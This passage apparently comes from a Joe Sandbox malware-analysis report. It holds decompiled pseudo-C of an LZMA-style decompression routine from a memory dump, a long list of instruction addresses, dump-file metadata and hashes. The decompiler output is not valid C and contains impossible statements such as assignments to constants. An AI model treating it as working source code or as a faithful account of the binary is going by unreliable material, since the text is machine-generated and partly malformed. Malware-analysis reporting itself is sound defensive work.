									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                    0x00000000
                                    0x004070ab
                                    0x004070ab
                                    0x004070af
                                    0x00407166
                                    0x00407169
                                    0x00407175
                                    0x00407056
                                    0x00407056
                                    0x00407059
                                    0x004073cb
                                    0x004073cb
                                    0x004073ce
                                    0x004073ce
                                    0x004073d4
                                    0x004073da
                                    0x004073e0
                                    0x004073fa
                                    0x004073fd
                                    0x00407403
                                    0x0040740e
                                    0x00407410
                                    0x004073e2
                                    0x004073e2
                                    0x004073f1
                                    0x004073f5
                                    0x004073f5
                                    0x0040741a
                                    0x00407441
                                    0x00407441
                                    0x00407447
                                    0x00407447
                                    0x00000000
                                    0x0040741c
                                    0x0040741c
                                    0x00407420
                                    0x004075cf
                                    0x00000000
                                    0x004075cf
                                    0x0040742c
                                    0x00407433
                                    0x0040743b
                                    0x0040743e
                                    0x00000000
                                    0x0040743e
                                    0x004070b5
                                    0x004070b9
                                    0x004075fa
                                    0x004075fa
                                    0x004075fd
                                    0x00407601
                                    0x00407601
                                    0x004070bf
                                    0x004070c5
                                    0x004070c8
                                    0x004070cc
                                    0x004070cf
                                    0x004070d3
                                    0x00407599
                                    0x004075e5
                                    0x004075ed
                                    0x004075f4
                                    0x004075f6
                                    0x00000000
                                    0x004075f6
                                    0x004070d9
                                    0x004070dc
                                    0x004070e2
                                    0x004070e4
                                    0x004070e4
                                    0x004070e7
                                    0x004070ea
                                    0x004070ed
                                    0x004070f0
                                    0x004070f3
                                    0x004070f6
                                    0x004070f7
                                    0x004070f9
                                    0x004070f9
                                    0x004070f9
                                    0x004070fc
                                    0x004070ff
                                    0x00407102
                                    0x00407105
                                    0x00407105
                                    0x00407108
                                    0x0040710a
                                    0x0040710a
                                    0x0040710d
                                    0x0040710d
                                    0x0040710d
                                    0x00406be3
                                    0x00406be3
                                    0x00406bec
                                    0x00000000
                                    0x00000000
                                    0x00406bf2
                                    0x00000000
                                    0x00406bfd
                                    0x00000000
                                    0x00000000
                                    0x00406c06
                                    0x00406c09
                                    0x00406c0c
                                    0x00406c10
                                    0x00000000
                                    0x00000000
                                    0x00406c16
                                    0x00406c19
                                    0x00406c1b
                                    0x00406c1c
                                    0x00406c1f
                                    0x00406c21
                                    0x00406c22
                                    0x00406c24
                                    0x00406c27
                                    0x00406c2c
                                    0x00406c31
                                    0x00406c3a
                                    0x00406c4d
                                    0x00406c50
                                    0x00406c5c
                                    0x00406c84
                                    0x00406c86
                                    0x00406c94
                                    0x00406c94
                                    0x00406c98
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406c88
                                    0x00406c88
                                    0x00406c8b
                                    0x00406c8c
                                    0x00406c8c
                                    0x00000000
                                    0x00406c88
                                    0x00406c62
                                    0x00406c67
                                    0x00406c67
                                    0x00406c70
                                    0x00406c78
                                    0x00406c7b
                                    0x00000000
                                    0x00406c81
                                    0x00406c81
                                    0x00000000
                                    0x00406c81
                                    0x00000000
                                    0x00406c9e
                                    0x00406c9e
                                    0x00406ca2
                                    0x0040754e
                                    0x00000000
                                    0x0040754e
                                    0x00406cab
                                    0x00406cbb
                                    0x00406cbe
                                    0x00406cc1
                                    0x00406cc1
                                    0x00406cc1
                                    0x00406cc4
                                    0x00406cc8
                                    0x00000000
                                    0x00000000
                                    0x00406cca
                                    0x00406cd0
                                    0x00406cfa
                                    0x00406d00
                                    0x00406d07
                                    0x00000000
                                    0x00406d07
                                    0x00406cd6
                                    0x00406cd9
                                    0x00406cde
                                    0x00406cde
                                    0x00406ce9
                                    0x00406cf1
                                    0x00406cf4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406d39
                                    0x00406d3f
                                    0x00406d42
                                    0x00406d4f
                                    0x00406d57
                                    0x00000000
                                    0x00000000
                                    0x00406d0e
                                    0x00406d0e
                                    0x00406d12
                                    0x0040755d
                                    0x00000000
                                    0x0040755d
                                    0x00406d1e
                                    0x00406d29
                                    0x00406d29
                                    0x00406d29
                                    0x00406d2c
                                    0x00406d2f
                                    0x00406d32
                                    0x00406d37
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406d5f
                                    0x00406d61
                                    0x00406d64
                                    0x00406dd5
                                    0x00406dd8
                                    0x00406ddb
                                    0x00406de2
                                    0x00406dec
                                    0x00000000
                                    0x00406dec
                                    0x00406d66
                                    0x00406d6a
                                    0x00406d6d
                                    0x00406d6f
                                    0x00406d72
                                    0x00406d75
                                    0x00406d77
                                    0x00406d7a
                                    0x00406d7c
                                    0x00406d81
                                    0x00406d84
                                    0x00406d87
                                    0x00406d8b
                                    0x00406d92
                                    0x00406d95
                                    0x00406d9c
                                    0x00406da0
                                    0x00406da8
                                    0x00406da8
                                    0x00406da8
                                    0x00406da2
                                    0x00406da2
                                    0x00406da2
                                    0x00406d97
                                    0x00406d97
                                    0x00406d97
                                    0x00406dac
                                    0x00406daf
                                    0x00406dcd
                                    0x00406dcf
                                    0x00000000
                                    0x00406db1
                                    0x00406db1
                                    0x00406db4
                                    0x00406db7
                                    0x00406dba
                                    0x00406dbc
                                    0x00406dbc
                                    0x00406dbc
                                    0x00406dbf
                                    0x00406dc2
                                    0x00406dc4
                                    0x00406dc5
                                    0x00406dc8
                                    0x00000000
                                    0x00406dc8
                                    0x00000000
                                    0x00406ffe
                                    0x00407002
                                    0x00407020
                                    0x00407023
                                    0x0040702a
                                    0x0040702d
                                    0x00407030
                                    0x00407033
                                    0x00407036
                                    0x00407039
                                    0x0040703b
                                    0x00407042
                                    0x00407043
                                    0x00407045
                                    0x00407048
                                    0x0040704b
                                    0x0040704e
                                    0x0040704e
                                    0x00407053
                                    0x00000000
                                    0x00407053
                                    0x00407004
                                    0x00407007
                                    0x0040700a
                                    0x00407014
                                    0x00000000
                                    0x00000000
                                    0x00407068
                                    0x0040706c
                                    0x0040708f
                                    0x00407092
                                    0x00407095
                                    0x0040709f
                                    0x0040706e
                                    0x0040706e
                                    0x00407071
                                    0x00407074
                                    0x00407077
                                    0x00407084
                                    0x00407087
                                    0x00407087
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040711c
                                    0x00407120
                                    0x00407127
                                    0x0040712a
                                    0x0040712d
                                    0x00407137
                                    0x00000000
                                    0x00407137
                                    0x00407122
                                    0x00000000
                                    0x00000000
                                    0x00407143
                                    0x00407147
                                    0x0040714e
                                    0x00407151
                                    0x00407154
                                    0x00407149
                                    0x00407149
                                    0x00407149
                                    0x00407157
                                    0x0040715a
                                    0x0040715d
                                    0x0040715d
                                    0x00407160
                                    0x00407163
                                    0x00000000
                                    0x00000000
                                    0x00407203
                                    0x00407203
                                    0x00407207
                                    0x004075a5
                                    0x00000000
                                    0x004075a5
                                    0x0040720d
                                    0x00407210
                                    0x00407213
                                    0x00407217
                                    0x0040721a
                                    0x00407220
                                    0x00407222
                                    0x00407222
                                    0x00407222
                                    0x00407225
                                    0x00407228
                                    0x00000000
                                    0x00000000
                                    0x00406df8
                                    0x00406df8
                                    0x00406dfc
                                    0x00407569
                                    0x00000000
                                    0x00407569
                                    0x00406e02
                                    0x00406e05
                                    0x00406e08
                                    0x00406e0c
                                    0x00406e0f
                                    0x00406e15
                                    0x00406e17
                                    0x00406e17
                                    0x00406e17
                                    0x00406e1a
                                    0x00406e1d
                                    0x00406e1d
                                    0x00406e20
                                    0x00406e23
                                    0x00000000
                                    0x00000000
                                    0x00406e29
                                    0x00406e2f
                                    0x00000000
                                    0x00000000
                                    0x00406e35
                                    0x00406e35
                                    0x00406e39
                                    0x00406e3c
                                    0x00406e3f
                                    0x00406e42
                                    0x00406e45
                                    0x00406e46
                                    0x00406e49
                                    0x00406e4b
                                    0x00406e51
                                    0x00406e54
                                    0x00406e57
                                    0x00406e5a
                                    0x00406e5d
                                    0x00406e60
                                    0x00406e63
                                    0x00406e7f
                                    0x00406e82
                                    0x00406e85
                                    0x00406e88
                                    0x00406e8f
                                    0x00406e93
                                    0x00406e95
                                    0x00406e99
                                    0x00406e65
                                    0x00406e65
                                    0x00406e69
                                    0x00406e71
                                    0x00406e76
                                    0x00406e78
                                    0x00406e7a
                                    0x00406e7a
                                    0x00406e9c
                                    0x00406ea3
                                    0x00406ea6
                                    0x00000000
                                    0x00406eac
                                    0x00000000
                                    0x00406eac
                                    0x00000000
                                    0x00406eb1
                                    0x00406eb1
                                    0x00406eb5
                                    0x00407575
                                    0x00000000
                                    0x00407575
                                    0x00406ebb
                                    0x00406ebe
                                    0x00406ec1
                                    0x00406ec5
                                    0x00406ec8
                                    0x00406ece
                                    0x00406ed0
                                    0x00406ed0
                                    0x00406ed0
                                    0x00406ed3
                                    0x00406ed6
                                    0x00406ed6
                                    0x00406ed6
                                    0x00406edc
                                    0x00000000
                                    0x00000000
                                    0x00406ede
                                    0x00406ee1
                                    0x00406ee4
                                    0x00406ee7
                                    0x00406eea
                                    0x00406eed
                                    0x00406ef0
                                    0x00406ef3
                                    0x00406ef6
                                    0x00406ef9
                                    0x00406efc
                                    0x00406f14
                                    0x00406f17
                                    0x00406f1a
                                    0x00406f1d
                                    0x00406f1d
                                    0x00406f20
                                    0x00406f24
                                    0x00406f26
                                    0x00406efe
                                    0x00406efe
                                    0x00406f06
                                    0x00406f0b
                                    0x00406f0d
                                    0x00406f0f
                                    0x00406f0f
                                    0x00406f29
                                    0x00406f30
                                    0x00406f33
                                    0x00000000
                                    0x00406f35
                                    0x00000000
                                    0x00406f35
                                    0x00406f33
                                    0x00406f3a
                                    0x00406f3a
                                    0x00406f3a
                                    0x00406f3a
                                    0x00000000
                                    0x00000000
                                    0x00406f75
                                    0x00406f75
                                    0x00406f79
                                    0x00407581
                                    0x00000000
                                    0x00407581
                                    0x00406f7f
                                    0x00406f82
                                    0x00406f85
                                    0x00406f89
                                    0x00406f8c
                                    0x00406f92
                                    0x00406f94
                                    0x00406f94
                                    0x00406f94
                                    0x00406f97
                                    0x00406f9a
                                    0x00406f9a
                                    0x00406fa0
                                    0x00406f3e
                                    0x00406f3e
                                    0x00406f41
                                    0x00000000
                                    0x00406f41
                                    0x00406fa2
                                    0x00406fa2
                                    0x00406fa5
                                    0x00406fa8
                                    0x00406fab
                                    0x00406fae
                                    0x00406fb1
                                    0x00406fb4
                                    0x00406fb7
                                    0x00406fba
                                    0x00406fbd
                                    0x00406fc0
                                    0x00406fd8
                                    0x00406fdb
                                    0x00406fde
                                    0x00406fe1
                                    0x00406fe1
                                    0x00406fe4
                                    0x00406fe8
                                    0x00406fea
                                    0x00406fc2
                                    0x00406fc2
                                    0x00406fca
                                    0x00406fcf
                                    0x00406fd1
                                    0x00406fd3
                                    0x00406fd3
                                    0x00406fed
                                    0x00406ff4
                                    0x00406ff7
                                    0x00000000
                                    0x00406ff9
                                    0x00000000
                                    0x00406ff9
                                    0x00000000
                                    0x00407286
                                    0x00407286
                                    0x0040728a
                                    0x004075b1
                                    0x00000000
                                    0x004075b1
                                    0x00407290
                                    0x00407293
                                    0x00407296
                                    0x0040729a
                                    0x0040729d
                                    0x004072a3
                                    0x004072a5
                                    0x004072a5
                                    0x004072a5
                                    0x004072a8
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00407395
                                    0x00407399
                                    0x004073bb
                                    0x004073be
                                    0x004073c8
                                    0x00000000
                                    0x004073c8
                                    0x0040739b
                                    0x0040739e
                                    0x004073a2
                                    0x004073a5
                                    0x004073a5
                                    0x004073a8
                                    0x00000000
                                    0x00000000
                                    0x00407452
                                    0x00407456
                                    0x00407474
                                    0x00407474
                                    0x00407474
                                    0x0040747b
                                    0x00407482
                                    0x00407489
                                    0x00407489
                                    0x00000000
                                    0x00407489
                                    0x00407458
                                    0x0040745b
                                    0x0040745e
                                    0x00407461
                                    0x00407468
                                    0x004073ac
                                    0x004073ac
                                    0x004073af
                                    0x00000000
                                    0x00000000
                                    0x00407543
                                    0x00407546
                                    0x00000000
                                    0x00000000
                                    0x0040717d
                                    0x0040717f
                                    0x00407186
                                    0x00407187
                                    0x00407189
                                    0x0040718c
                                    0x00000000
                                    0x00000000
                                    0x00407194
                                    0x00407197
                                    0x0040719a
                                    0x0040719c
                                    0x0040719e
                                    0x0040719e
                                    0x0040719f
                                    0x004071a2
                                    0x004071a9
                                    0x004071ac
                                    0x004071ba
                                    0x00000000
                                    0x00000000
                                    0x00407490
                                    0x00407490
                                    0x00407493
                                    0x0040749a
                                    0x00000000
                                    0x00000000
                                    0x0040749f
                                    0x0040749f
                                    0x004074a3
                                    0x004075db
                                    0x00000000
                                    0x004075db
                                    0x004074a9
                                    0x004074ac
                                    0x004074af
                                    0x004074b3
                                    0x004074b6
                                    0x004074bc
                                    0x004074be
                                    0x004074be
                                    0x004074be
                                    0x004074c1
                                    0x004074c4
                                    0x004074c4
                                    0x004074c4
                                    0x004074c4
                                    0x004074c7
                                    0x004074c7
                                    0x004074cb
                                    0x0040752b
                                    0x0040752e
                                    0x00407533
                                    0x00407534
                                    0x00407536
                                    0x00407538
                                    0x0040753b
                                    0x00000000
                                    0x0040753b
                                    0x004074cd
                                    0x004074d3
                                    0x004074d6
                                    0x004074d9
                                    0x004074dc
                                    0x004074df
                                    0x004074e2
                                    0x004074e5
                                    0x004074e8
                                    0x004074eb
                                    0x004074ee
                                    0x00407507
                                    0x0040750a
                                    0x0040750d
                                    0x00407510
                                    0x00407514
                                    0x00407516
                                    0x00407516
                                    0x00407517
                                    0x0040751a
                                    0x004074f0
                                    0x004074f0
                                    0x004074f8
                                    0x004074fd
                                    0x004074ff
                                    0x00407502
                                    0x00407502
                                    0x0040751d
                                    0x00407524
                                    0x00000000
                                    0x00407526
                                    0x00000000
                                    0x00407526
                                    0x00000000
                                    0x004071c2
                                    0x004071c5
                                    0x004071fb
                                    0x0040732b
                                    0x0040732b
                                    0x0040732b
                                    0x0040732b
                                    0x0040732e
                                    0x0040732e
                                    0x00407331
                                    0x00407333
                                    0x004075bd
                                    0x00000000
                                    0x004075bd
                                    0x00407339
                                    0x0040733c
                                    0x00000000
                                    0x00000000
                                    0x00407342
                                    0x00407346
                                    0x00407349
                                    0x00407349
                                    0x00407349
                                    0x00000000
                                    0x00407349
                                    0x004071c7
                                    0x004071c9
                                    0x004071cb
                                    0x004071cd
                                    0x004071d0
                                    0x004071d1
                                    0x004071d3
                                    0x004071d5
                                    0x004071d8
                                    0x004071db
                                    0x004071f1
                                    0x004071f6
                                    0x0040722e
                                    0x0040722e
                                    0x00407232
                                    0x0040725e
                                    0x00407260
                                    0x00407267
                                    0x0040726a
                                    0x0040726d
                                    0x0040726d
                                    0x00407272
                                    0x00407272
                                    0x00407274
                                    0x00407277
                                    0x0040727e
                                    0x00407281
                                    0x004072ae
                                    0x004072ae
                                    0x004072b1
                                    0x004072b4
                                    0x00407328
                                    0x00407328
                                    0x00407328
                                    0x00000000
                                    0x00407328
                                    0x004072b6
                                    0x004072bc
                                    0x004072bf
                                    0x004072c2
                                    0x004072c5
                                    0x004072c8
                                    0x004072cb
                                    0x004072ce
                                    0x004072d1
                                    0x004072d4
                                    0x004072d7
                                    0x004072f0
                                    0x004072f2
                                    0x004072f5
                                    0x004072f6
                                    0x004072f9
                                    0x004072fb
                                    0x004072fe
                                    0x00407300
                                    0x00407302
                                    0x00407305
                                    0x00407307
                                    0x0040730a
                                    0x0040730e
                                    0x00407310
                                    0x00407310
                                    0x00407311
                                    0x00407314
                                    0x00407317
                                    0x004072d9
                                    0x004072d9
                                    0x004072e1
                                    0x004072e6
                                    0x004072e8
                                    0x004072eb
                                    0x004072eb
                                    0x0040731a
                                    0x00407321
                                    0x004072ab
                                    0x004072ab
                                    0x004072ab
                                    0x004072ab
                                    0x00000000
                                    0x00407323
                                    0x00000000
                                    0x00407323
                                    0x00407321
                                    0x00407234
                                    0x00407237
                                    0x00407239
                                    0x0040723c
                                    0x0040723f
                                    0x00407242
                                    0x00407244
                                    0x00407247
                                    0x0040724a
                                    0x0040724a
                                    0x0040724d
                                    0x0040724d
                                    0x00407250
                                    0x00407257
                                    0x0040722b
                                    0x0040722b
                                    0x0040722b
                                    0x0040722b
                                    0x00000000
                                    0x00407259
                                    0x00000000
                                    0x00407259
                                    0x00407257
                                    0x004071dd
                                    0x004071e0
                                    0x004071e2
                                    0x004071e5
                                    0x00000000
                                    0x00000000
                                    0x00406f44
                                    0x00406f44
                                    0x00406f48
                                    0x0040758d
                                    0x00000000
                                    0x0040758d
                                    0x00406f4e
                                    0x00406f51
                                    0x00406f54
                                    0x00406f57
                                    0x00406f5a
                                    0x00406f5d
                                    0x00406f60
                                    0x00406f62
                                    0x00406f65
                                    0x00406f68
                                    0x00406f6b
                                    0x00406f6d
                                    0x00406f6d
                                    0x00406f6d
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040734c
                                    0x0040734c
                                    0x0040734c
                                    0x00407350
                                    0x00000000
                                    0x00000000
                                    0x00407356
                                    0x00407359
                                    0x0040735c
                                    0x0040735f
                                    0x00407361
                                    0x00407361
                                    0x00407361
                                    0x00407364
                                    0x00407367
                                    0x0040736a
                                    0x0040736d
                                    0x00407370
                                    0x00407373
                                    0x00407374
                                    0x00407376
                                    0x00407376
                                    0x00407376
                                    0x00407379
                                    0x0040737c
                                    0x0040737f
                                    0x00407382
                                    0x00407385
                                    0x00407389
                                    0x0040738b
                                    0x0040738e
                                    0x00000000
                                    0x00407390
                                    0x00000000
                                    0x00407390
                                    0x0040738e
                                    0x004075c3
                                    0x00000000
                                    0x00000000
                                    0x00406bf2

                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                    • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                    • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                    • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 98%
                                    			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
